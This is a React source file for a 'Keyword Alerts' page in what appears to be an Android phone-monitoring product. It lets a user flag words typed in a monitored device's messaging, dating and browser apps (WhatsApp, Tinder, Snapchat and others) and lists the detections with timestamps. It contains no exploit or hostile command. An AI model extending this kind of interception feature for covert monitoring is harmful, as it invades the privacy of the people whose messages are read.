import { Fragment, useRef, useEffect, useState, useMemo, useCallback } from 'react'
import Image from 'next/image'
import dayjs from 'dayjs'
import { styled } from '@mui/material'
import { useRouter } from "next/router"
import { useTranslation } from 'src/utils/i18n'

import { useAndroidDevicePagedData } from 'src/hooks/useAndroidDevicePagedData'
import { useDeviceScopedInit } from 'src/hooks/useDeviceScopedInit'
import { setBlock, androidLocalRefresh } from 'src/@api/android'
import { useDispatch } from 'react-redux'
import { setCurrentTab } from 'src/store/apps/Common'
import ContentLoading from 'src/components/ContentLoading'

// 自定义隐藏滚动条且保留滚动特性(div
const ScrollDiv = styled('div')({
  '@media (max-width: 600px)': {
    '-msOverflowStyle': 'none',  /* 适用于 IE 和 Edge */
    scrollbarWidth: 'none',  /* 适用于 Firefox */
    '&::-webkit-scrollbar': {
      display: 'none', /* 适用于 WebKit 浏览器（如 Chrome、Safari 和新版 Edge） */
    }
  }
})

// 自定义隐藏滚动条且保留滚动特性(ul
const ScrollUl = styled('ul')({
  '-msOverflowStyle': 'none',  /* 适用于 IE 和 Edge */
  scrollbarWidth: 'none',  /* 适用于 Firefox */
  '&::-webkit-scrollbar': {
    display: 'none', /* 适用于 WebKit 浏览器（如 Chrome、Safari 和新版 Edge） */
  }
})

// 自定义滚动条(ul
const ScrollUlShow = styled('ul')({
  '-msOverflowStyle': 'none',  /* 适用于 IE 和 Edge */
  scrollbarWidth: 'thin',  /* 适用于 Firefox，设置滚动条为细 */
  '&::-webkit-scrollbar': {
    width: '4px',  /* 设置滚动条的宽度为 4px */
  },
  '&::-webkit-scrollbar-thumb': {
    backgroundColor: '#888',  /* 设置滚动条滑块的颜色 */
    borderRadius: '10px',  /* 设置滑块圆角 */
  },
  '&::-webkit-scrollbar-track': {
    backgroundColor: '#f1f1f1',  /* 设置滚动条轨道的颜色 */
  },
  '@media (max-width: 600px)': {
    '-msOverflowStyle': 'none',  /* 适用于 IE 和 Edge */
    scrollbarWidth: 'none',  /* 适用于 Firefox */
    '&::-webkit-scrollbar': {
      display: 'none', /* 适用于 WebKit 浏览器（如 Chrome、Safari 和新版 Edge） */
    }
  }
})

const KeywordAlerts = ({ }) => {
  const { t, locale } = useTranslation('common')
  const dispatch = useDispatch()
  const dictionaries = {
    selectFeatures: {
      list: [
        { key: 'All' }, { key: 'Badoo' }, { key: 'Facebook' }, { key: 'Facebook Lite' }, { key: 'Facebook Messenger' }, { key: 'Facebook Messenger Lite' }, { key: 'WhatsApp' }, { key: 'LINE' }, { key: 'Messages' }, { key: 'Snapchat' }, { key: 'Telegram' }, { key: 'Instagram' }, { key: 'Tinder' }, { key: 'Discord' }, { key: 'Hangouts' }, { key: 'TikTok' }, { key: 'Kik' }, { key: 'QQ' }, { key: 'Skype' }, { key: 'Tumblr' }, { key: 'Viber' }, { key: 'WeChat' }, { key: 'Chrome' }
      ]
    },
    notificationType: {
      list: [{ key: t('Notify to email') }, { key: t('Do not notify') }]
    }
  }

  const [showLeftData, setShowLeftData] = useState([]) // Tracking Rules显示的数据
  const [nowPage, setNowPage] = useState(0) // 当前选中的页
  const [wordValue, setWordValue] = useState('') // 当前输入的Word or Phrase值
  const [wordFlag, setWordFlag] = useState(0) // 是否输入Word or Phrase值
  const [activeFeatures, setActiveFeatures] = useState(false) // 是否展开Select Features下拉框
  const [featureValue, setFeatureValue] = useState(dictionaries.selectFeatures.list[0].key) // 当前选择的Select Features值
  const [activeNotify, setActiveNotify] = useState(false) // 是否展开Notification Type下拉框
  const [notifyValue, setNotifyValue] = useState(dictionaries.notificationType.list[0].key) // 当前选择的Notification Type值
  const { context, data: showRightData, loading: isLoading, loadNext } = useAndroidDevicePagedData({
    source: 'local',
    category: 'MONITOR_KEYWORD',
    limit: 100
  })

  // 设备切换时重置关键词列表与筛选状态
  useDeviceScopedInit(
    useCallback(async (_, { context: scopedContext, isCurrent }) => {
      setShowLeftData([])
      setNowPage(0)
      setWordValue('')
      setWordFlag(0)
      setActiveFeatures(false)
      setActiveNotify(false)
      const result = await setBlock({ device_id: scopedContext?.username || '' })
      if (isCurrent()) setShowLeftData(result?.data?.keyword || [])
    }, [])
  )

  const Delete = async ({ feature, text }) => {
    const deviceId = context?.username || ''
    const result = await setBlock({ device_id: deviceId, type: 'keyword', name: { feature, text }, action: false })
    await androidLocalRefresh({ device_id: deviceId, type: 49, text, feature, limit: false })
    setShowLeftData(result?.data?.keyword || [])
  }

  const addData = async () => {
    const exists = showLeftData?.some(item => item.feature === featureValue && item.text === wordValue)
    if (!exists) {
      const deviceId = context?.username || ''
      const result = await setBlock({ device_id: deviceId, type: 'keyword', name: { feature: featureValue, text: wordValue }, action: true })
      await androidLocalRefresh({ device_id: deviceId, type: 49, text: wordValue, feature: featureValue, limit: true })
      setShowLeftData(result?.data?.keyword || [])
    }
  }

  const leftDom = useRef(null)
  const rightDom = useRef(null)

  // 滚动百分比
  const [scroll, setScroll] = useState(0)

  // 获取滚动百分比
  useEffect(() => {
    const handScroll = () => {
      if (rightDom.current) {
        const { scrollTop, scrollHeight, clientHeight } = rightDom.current
        const progress = (scrollTop / (scrollHeight - clientHeight)) * 100
        setScroll(progress.toFixed(0))
      }
    }
    const currentRef = rightDom.current
    if (currentRef) {
      currentRef.addEventListener('scroll', handScroll)
    }

    return () => {
      if (currentRef) {
        currentRef.removeEventListener('scroll', handScroll)
      }
    }
  }, [])

  // 监听滚动百分比
  useEffect(() => {
    if (scroll >= 100) loadNext()
  }, [loadNext, scroll])

  // 获取当前语种的dayjs
  useEffect(() => {
    const handleLocale = async () => {
      switch (locale) {
        case 'fr':
          await import('dayjs/locale/fr')
          dayjs.locale('fr')
          break
        case 'jp':
          await import('dayjs/locale/ja')
          dayjs.locale('ja')
          break
        case 'es':
          await import('dayjs/locale/es')
          dayjs.locale('es')
          break
        case 'de':
          await import('dayjs/locale/de')
          dayjs.locale('de')
          break
        case 'it-ch':
          await import('dayjs/locale/it')
          dayjs.locale('it')
          break
        case 'pt':
          await import('dayjs/locale/pt')
          dayjs.locale('pt')
          break
        case 'kr':
          await import('dayjs/locale/ko')
          dayjs.locale('ko')
          break
        case 'tr':
          await import('dayjs/locale/tr')
          dayjs.locale('tr')
          break
        case 'ar':
          await import('dayjs/locale/ar')
          dayjs.locale('ar')
          break
        case 'tw':
          await import('dayjs/locale/zh-tw')
          dayjs.locale('zh-tw')
          break
        case 'ru':
          await import('dayjs/locale/ru')
          dayjs.locale('ru')
          break
        case 'nl':
          await import('dayjs/locale/nl')
          dayjs.locale('nl')
          break
        case 'pl':
          await import('dayjs/locale/pl')
          dayjs.locale('pl')
          break
        case 'sv':
          await import('dayjs/locale/sv')
          dayjs.locale('sv')
          break
        default:
          await import('dayjs/locale/en')
          dayjs.locale('en')
      }
    }
    handleLocale()
  }, [locale])

  useEffect(() => {
    const title = t('Keyword Alerts')
    dispatch(setCurrentTab(title))

    return () => dispatch(setCurrentTab(''))
  }, [dispatch, t])

  // 埋点上报
  useEffect(() => {
    if (showLeftData?.length === 0 && showRightData?.length === 0) return
    if (Array.isArray(showLeftData) && showLeftData?.length > 0) {
      const events = showLeftData.map(item => ({
        event_name: 'Info_Open_Web_Keywordalerts_Info',
        properties: {
          app: item?.feature || '',
          text: item?.text || '',
        }
      }))

    }

    // if (Array.isArray(showRightData) && showRightData.length > 0) {
    //   const events = showRightData.map(item => ({
    //     event_name: 'Info_Open_Web_Keywordalerts_Info',
    //     properties: {
    //       app: item?.feature || '',
    //       text: item?.text || '',
    //       time: item?.time || '',
    //     }
    //   }))
    // }
  }, [showLeftData, showRightData])

  return (
    <Fragment>
      {/* 切换页 */}
      <div className='w-full flex justify-center items-center mb-[24px]'>
        <div className='w-max h-[42px] px-[2px] flex justify-between items-center bg-[#EAEAEA] rounded-[8px] text-[14px] text-[#000000] font-[Poppins] font-[600] leading-[21px] relative'>
          <div className={`p-[8px_12px_9px_12px] ${nowPage === 0 ? 'font-[600] text-[#2405F2] bg-[#FFFFFF] rounded-[6px]' : 'font-[400]'} cursor-pointer text-nowrap mr-[15px] relative z-10`} onClick={() => setNowPage(0)}>{t('Tracking Rules')}</div>
          <div className={`p-[8px_12px_9px_12px] ${nowPage === 1 ? 'font-[600] text-[#2405F2] bg-[#FFFFFF] rounded-[6px]' : 'font-[400]'} cursor-pointer text-nowrap relative z-10`} onClick={() => setNowPage(1)}>{t('Keywords Detected')}</div>
        </div>
      </div>

      {/* 展示页 */}
      <ScrollDiv className='bg-white w-full !h-[calc(var(--vh2)*100-278px)] smj:!h-[calc(var(--vh2)*100-155px)] [box-shadow:0px_0px_12px_0px_#00000021] rounded-[10px] overflow-auto relative'>
        {/* Tracking Rules */}
        <div className={`${nowPage !== 0 ? 'hidden' : 'smjs:flex'} smjs:!h-[calc(var(--vh2)*100-278px)] smjs:overflow-hidden`}>
          {/* 左侧 */}
          <div className='smjs:min-w-[460px] smj:w-full smjs:!h-[calc(var(--vh2)*100-278px)] smj:h-auto smjs:[border-right:1px_solid_#DCDCDC] smj:p-[16px_10px_30px_10px] smjs:p-[36px_30px_0px_30px]'>
            <div className='mb-[10px] text-[16px] font-[Poppins] font-[600] leading-[24px] smj:hidden'>{t('Add Rule')}</div>
            {/* 设置规则卡片 */}
            <div className='[border:1px_solid_#DCDCDC] rounded-[8px] p-[18px_30px_30px_30px] smj:p-[15px_10px_24px_16px]'>
              <div className='mb-[27px] text-[16px] font-[Poppins] font-[600] leading-[24px] smjs:hidden'>{t('Add Rule')}</div>
              {/* Word or Phrase */}
              <p className='text-[12px] smj:text-[13px] font-[Poppins] font-[400] leading-[18px] smj:leading-[19.5px] mb-[4px] smj:mb-[3px]'>{t('Word or Phrase')}</p>
              <input
                id='wordText'
                type='text'
                placeholder={t('Enter word or phrase')}
                className={`w-full h-[40px] smj:h-[36px] bg-[#F4F5F6] rounded-[30px] outline-none
                  ${wordFlag === 1 ? 'shadow-[inset_0px_0px_0px_1px_red] placeholder:text-red-500 caret-red-500' : 'focus:shadow-[inset_0px_0px_0px_1px_#2405F2] caret-[#2405F2]'}
                  pl-[18px] text-[12px] text-[#000000] placeholder:text-[#9E9E9E] placeholder:font-[Poppins] placeholder:font-[400] placeholder:leading-[18px]`}
                value={wordValue}
                onChange={e => {
                  if (e.target.value.trim() !== '') setWordFlag(0)
                  setWordValue(e.target.value)
                }}
              />

              {/* Select Features */}
              <p className='text-[12px] smj:text-[13px] font-[Poppins] font-[400] leading-[18px] smj:leading-[19.5px] mt-[12px] smj:mt-[11px] mb-[4px] smj:mb-[3px]'>{t('Select Features')}</p>
              <div className='cursor-pointer relative'>
                <div className={`w-full h-[40px] smj:h-[36px] flex items-center bg-[#F4F5F6] rounded-[30px] relative pl-[18px] ${activeFeatures === true ? 'shadow-[inset_0px_0px_0px_1px_#2405F2]' : ''} mb-[3px]`}
                  onClick={() => {
                    if (!activeFeatures) {
                      document.getElementsByClassName('scrollUl1')[0].scrollTop = 0 // 重置下拉框的滚动条进度
                      setActiveNotify(false) // 关闭另一个下拉框
                    }
                    setActiveFeatures(!activeFeatures)
                  }}
                >
                  <span className='text-[12px] text-[#9E9E9E] font-[Poppins] font-[400] leading-[18px]'>{featureValue}</span>
                  <Image src='/images/navigation/down-arrow.svg' width={15} height={15} alt='arrow'
                    className={`absolute top-[50%] -translate-y-[50%] right-[12px] transition-transform duration-200 ease-linear ${activeFeatures ? 'rotate-[180deg]' : 'rotate-0'}`} />
                </div>
                <ScrollUl className={`bg-white scrollUl1 w-full max-h-0 overflow-auto [box-shadow:0px_0px_8px_0px_#00000026] rounded-[8px] transition-[max-height] duration-200 ease-linear ${activeFeatures ? 'max-h-[350px]' : ''} absolute z-[5254]`}>
                  {dictionaries.selectFeatures.list.map((item, index) => (
                    <li
                      key={index}
                      className={`text-[14px] font-[Poppins] font-[400] leading-[21px] bg-[#FFFFFF] p-[12px_0px_12px_18px] ${featureValue === item.key ? 'text-[#2405F2]' : ' text-[#222222] hover:bg-[#F5F5F5]'}`}
                      onClick={() => {
                        setFeatureValue(item.key)
                        setActiveFeatures(false)
                      }}
                    >{item.key}</li>
                  ))}
                </ScrollUl>
              </div>

              {/* Notification Type */}
              <p className='text-[12px] smj:text-[13px] font-[Poppins] font-[400] leading-[18px] smj:leading-[19.5px] mt-[10px] smj:mt-[11px] mb-[4px] smj:mb-[3px]'>{t('Notification Type')}</p>
              <div className='cursor-pointer relative'>
                <div className={`w-full h-[40px] smj:h-[36px] flex items-center bg-[#F4F5F6] rounded-[30px] relative pl-[18px] ${activeNotify === true ? 'shadow-[inset_0px_0px_0px_1px_#2405F2]' : ''} mb-[3px]`}
                  onClick={() => {
                    if (!activeNotify) {
                      document.getElementsByClassName('scrollUl2')[0].scrollTop = 0 // 重置下拉框的滚动条进度
                      setActiveFeatures(false) // 关闭另一个下拉框
                    }
                    setActiveNotify(!activeNotify)
                  }}
                >
                  <span className='text-[12px] text-[#9E9E9E] font-[Poppins] font-[400] leading-[18px]'>{notifyValue}</span>
                  <Image src='/images/navigation/down-arrow.svg' width={15} height={15} alt='arrow'
                    className={`absolute top-[50%] -translate-y-[50%] right-[12px] transition-transform duration-200 ease-linear ${activeNotify ? 'rotate-[180deg]' : 'rotate-0'}`} />
                </div>
                <ScrollUl className={`bg-white scrollUl2 w-full max-h-0 overflow-auto [box-shadow:0px_0px_8px_0px_#00000026] rounded-[8px] transition-[max-height] duration-200 ease-linear ${activeNotify ? 'max-h-[92px]' : ''} absolute z-[5254]`}>
                  {dictionaries.notificationType.list.map((item, index) => (
                    <li
                      key={index}
                      className={`text-[14px] font-[Poppins] font-[400] leading-[21px] bg-[#FFFFFF] ${index === 0 ? 'p-[12px_0px_12px_18px]' : 'p-[12px_0px_12px_18px]'} ${notifyValue === item.key ? 'text-[#2405F2]' : ' text-[#222222] hover:bg-[#F5F5F5]'}`}
                      onClick={() => {
                        setNotifyValue(item.key)
                        setActiveNotify(false)
                      }}
                    >{item.key}</li>
                  ))}
                </ScrollUl>
              </div>

              {/* Add按钮 */}
              <div className='flex justify-center mt-[30px]'>
                <button
                  className='w-[180px] h-[40px] smj:h-[36px] bg-[#FFCF55] rounded-[30px] text-[12px] text-[#000000] font-[Poppins] font-[600] leading-[18px]'
                  onClick={() => {
                    if (wordValue.trim() === '') {
                      setWordFlag(1)
                      document.getElementById('wordText').focus()
                    } else addData()
                  }}
                >{t('Add')}</button>
              </div>
            </div>
          </div>

          {/* 右侧展示数据 */}
          <div className='w-full p-[36px_30px_10px_36px] smj:p-[0px_0px_0px_18px] overflow-auto'>
            <div className='pb-[10px] text-[16px] font-[Poppins] font-[600] leading-[24px] smj:hidden'>{t('Added Rules')}</div>
            <ScrollUlShow ref={e => {
              if (nowPage === 0) leftDom.current = e
            }} className='w-full h-auto smjs:pr-[30px] overflow-auto'>
              <div className='w-full flex items-center'>
                <li className='grid grid-cols-3 items-center bg-[#FFF] sticky top-0 text-[14px] text-[#000000] font-[Poppins] font-[600] leading-[21px] flex-grow relative'>
                  <p className='p-[22px_0px_16px_26px] smj:p-[0px_0px_0px_0px]'>{t('Keywords')}</p>
                  <p className='p-[22px_0px_16px_0px] smj:p-[0px_0px_0px_0px]'>{t('Features')}</p>
                  <p className='p-[22px_0px_16px_0px] smj:p-[0px_18px_0px_0px]'>{t('Notification Type')}</p>
                </li>
                <div className='mx-[25px] text-[14px] font-[Roboto] leading-[16px] text-[#2A99FF] opacity-0 smj:hidden'>{t('Delete rule')}</div>
                <Image src={'/images/navigation/delete.svg'} width={20} height={20} alt='delete rule' className='smj:mx-[12px] opacity-0 smjs:hidden' />
              </div>
              {showLeftData && showLeftData.map((item, index) => (
                <div key={index} className='flex items-center w-full [border-bottom:1px_solid_#DCDCDC]'>
                  <li i className='grid grid-cols-3 items-center text-[14px] text-[#000000] font-[Poppins] font-[400] leading-[21px] flex-grow last:border-none'>
                    <p className='p-[13px_0px_14px_26px] smj:p-[21px_0px_22px_0px]'>{item.text}</p>
                    <p className='p-[13px_0px_14px_0px] smj:p-[21px_0px_22px_0px]'>{item.feature}</p>
                    <p className='p-[13px_0px_14px_0px] smj:p-[21px_18px_22px_0px]'>{t('Notify to email')}</p>
                  </li>
                  <div className='mx-[25px] text-[14px] font-[Roboto] leading-[16px] text-[#2A99FF] smj:hidden cursor-pointer' onClick={() => Delete({ feature: item.feature, text: item.text })}>{t('Delete rule')}</div>
                  <Image src={'/images/navigation/delete.svg'} width={20} height={20} alt='delete rule' className='smj:mx-[12px] smjs:hidden' onClick={() => Delete({ feature: item.feature, text: item.text })} />
                </div>
              ))}
            </ScrollUlShow>
          </div>
        </div>

        {/* Keywords Detected */}
        <div className={`w-full ${nowPage === 0 ? 'hidden' : ''}`}>
          <ScrollUlShow ref={rightDom} className='w-full !h-[calc(var(--vh2)*100-278px)] smj:!h-[calc(var(--vh2)*100-155px)] p-[0px_30px_10px_62px] smj:p-[0px_0px_10px_18px] overflow-auto'>
            <li className='grid grid-cols-3 bg-[#FFF] sticky top-0 text-[14px] text-[#000000] font-[Poppins] font-[600] leading-[21px] mb-[1px] relative'>
              <p className='p-[36px_0px_16px_0px] smj:pt-[20px]'>{t('Keywords')}</p>
              <p className='p-[36px_0px_16px_0px] smj:pt-[20px]'>{t('Features')}</p>
              <p className='p-[36px_0px_16px_0px] smj:pt-[20px]'>{t('Time')}</p>
            </li>
            {
              showRightData.map((item, index) => (
                <li key={index} i className='grid grid-cols-3 items-center text-[14px] text-[#000000] font-[Poppins] font-[400] leading-[21px] [border-top:1px_solid_#DCDCDC]'>
                  <p className='p-[15px_0px_12px_0px] smj:p-[11px_0px_11px_0px]'>{item.text}</p>
                  <p className='p-[15px_0px_12px_0px] smj:p-[11px_0px_11px_0px]'>{item.feature}</p>
                  <p className='p-[15px_0px_12px_0px] smj:p-[11px_21px_11px_0px]'>{dayjs(item.time).format('MMM DD, YYYY HH:mm')}</p>
                </li>
              ))
            }
          </ScrollUlShow>
          {isLoading ? (
        <div className='absolute inset-0 z-[20] bg-[#FFF] rounded-[10px]'>
          <ContentLoading />
        </div>
      ) : null}
{(showRightData.length > 0 || isLoading) ||
            <div className='text-center px-5 absolute inset-0 flex justify-center items-center pointer-events-none'>
              {t('It appears theres no data to show here yet')}<br />
              {t('If data exists it may take up to 1 hour to download and appear')}<br />
              {t('We suggest checking back in a little while')}
            </div>}
        </div>
      </ScrollDiv>
    </Fragment>
  )
}

export default KeywordAlerts
